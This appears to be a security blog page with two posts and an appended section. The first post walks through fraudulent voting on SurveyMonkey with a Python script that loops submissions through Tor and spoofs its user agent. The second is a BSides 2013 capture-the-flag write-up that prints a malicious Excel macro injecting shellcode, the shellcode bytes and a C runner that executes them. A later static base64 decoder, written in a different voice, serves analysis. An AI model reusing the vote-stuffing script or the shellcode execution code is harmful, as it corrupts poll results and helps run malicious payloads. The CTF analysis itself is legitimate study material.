Survey Monkey has no captcha, beware

Survey Monkey is used for surveys, so you want the results to be real.

This post will show how easy it would be to vote fraudulently and manipulate poll results.

For this example I will be using Python with its mechanize module and Tor installed on Linux. You will also need Firefox with the TamperData plugin.

Firstly I have created a test Survey.


Next I will find out the post data using TamperData.


The important data has been highlighted. The input name on the left is the name of the form element for the “What is my name” question, and the number corresponding to it on the far right is the answer I picked, “billy”. The rest of the post data is hidden fields and tokens to identify the response.

With this information it’s easy to put together a script to automate the submission of the survey. Below is the commented code for the example submission.

#!/usr/bin/env python
#SurveyMonkey needs captcha
import mechanize
import socks
import socket
#patch to use Tor, code from Stack Overflow, not mine
def create_connection(address, timeout=None, source_address=None):
    sock = socks.socksocket()
    return sock

socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "", 9050)
socket.socket = socks.socksocket
socket.create_connection = create_connection
count = 0
while True:
    br = mechanize.Browser()  # Open the browser object
    br.addheaders = [('User-agent', ' Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31')]
    br.open('')  # survey to test
    #What is my name?
    #Drop down you say selection c
    #Tell me about yourself
    text = "testing 123" # text for the form
    br.submit()#submit the form
    br.response().read()#print the response
    print br.response().read()
    print "Number of votes: "+ str(count) # print number of votes

The script worked as expected and billy was the most popular name.


Solving Bsides 2013 Challenge 1

The challenge was to get a password from the Excel document.

If you looked inside the macro for the Excel document you could see it was running shellcode.

So I edited the macro to write the shellcode to a file before it was run.

Private Sub ExecuteShellCode()
Dim lpMemory As Long
Dim sShellCode As String
Dim lResult As Long

sShellCode = ShellCode()
Open "C:\shellcode" For Output As #1
Write #1, ShellCode()
Close #1
lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&)
lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&)
End Sub

After opening the file, it has some shellcode that decodes and runs the exe that's base64 encoded.


So I just ran the shellcode using C. As the shellcode was super long, Windows didn’t like it, so I used GCC.

#include <stdio.h>

char shellcode[] = "\xeb\x3a\x31\xd2\x80\x3b\x2b\x75\x04\xb2\x3e\xeb\x26\x80\x3b\x2f\x75\x04\xb2\x3f\xeb\x1d\x80\x3b\x39\x77\x07\x8a\x13\x80\xea\xfc\xeb\x11\x80\x3b\x5a\x77\x07\x8a\x13\x80\xea\x41\xeb\x05\x8a\x13\x80\xea\x47\xc1\xe0\x06\x08\xd0\x43\xc3\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x31\xc9\x80\xc1\x36\x01\xcb\x89\xd9\x31\xc0\x80\x3b\x3d\x74\x25\xe8\xab\xff\xff\xff\xe8\xa6\xff\xff\xff\xe8\xa1\xff\xff\xff\xe8\x9c\xff\xff\xff\x86\xc4\xc1\xc0\x10\x86\xc4\xc1\xc8\x08\x89\x01\x83\xc1\x03\xeb\xd4"

"6FoIAADDVYnlUVZXi00Mi3UQi30U/ +9999 lines of base64 encoded lines.


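int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) shellcode; /* treat the byte array as a function */
    (int)(*func)();               /* jump into the shellcode */
    return 0;
}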

I then loaded it into Olly and stepped through the program, keeping an eye on what chars were in the registers, until I saw “ExcelMagic” in ECX, which was being compared to my input.
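
The decoder stub at the start of the shellcode array above maps characters with the standard base64 alphabet and stops at '=', so the embedded stage can also be recovered statically for inspection. This is an added example, not the author's code: it assumes the dump is the stub followed by one contiguous base64 run, the function names are hypothetical, and the sample reuses only the base64 prefix visible in the listing.

```python
import re

# Assumption: the dump is a short binary stub followed by one contiguous base64 run.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}")


def sextet(c: int) -> int:
    """Same mapping as the stub's helper routine, but rejecting other bytes."""
    if c == 0x2B:                      # cmp byte [ebx], 0x2b  ('+')
        return 0x3E
    if c == 0x2F:                      # cmp byte [ebx], 0x2f  ('/')
        return 0x3F
    if 0x30 <= c <= 0x39:              # digits: sub dl, 0xfc  (adds 4)
        return (c - 0xFC) & 0xFF
    if 0x41 <= c <= 0x5A:              # 'A'-'Z': sub dl, 0x41
        return c - 0x41
    if 0x61 <= c <= 0x7A:              # 'a'-'z': sub dl, 0x47
        return c - 0x47
    raise ValueError("byte 0x%02x is not in the base64 alphabet" % c)


def extract_stage(dump: bytes) -> bytes:
    """Decode the embedded stage without executing any of it."""
    run = max(B64_RUN.findall(dump), key=len, default=b"")
    if not run:
        raise ValueError("no base64 run found in dump")
    run = run[: len(run) - len(run) % 4]       # the stub consumes 4 chars per pass
    out = bytearray()
    for i in range(0, len(run), 4):
        word = 0
        for c in run[i:i + 4]:
            word = (word << 6) | sextet(c)     # shl eax, 6 / or al, dl
        out += word.to_bytes(3, "big")         # stub stores the 3 bytes high-first
    return bytes(out)


def classify(stage: bytes) -> str:
    """First triage question: a PE file, or more raw code?"""
    return "PE executable" if stage[:2] == b"MZ" else "raw code/data"


# Constructed sample: 8 placeholder bytes standing in for the stub, the base64
# prefix shown on the page (trailing '/' dropped to keep whole groups), then '='.
SAMPLE = b"\x90" * 8 + b"6FoIAADDVYnlUVZXi00Mi3UQi30U" + b"="

if __name__ == "__main__":
    stage = extract_stage(SAMPLE)
    print(stage.hex(), "->", classify(stage))
```

Run against the real dump file, the decoded bytes can be written to disk and opened in a disassembler instead of being executed.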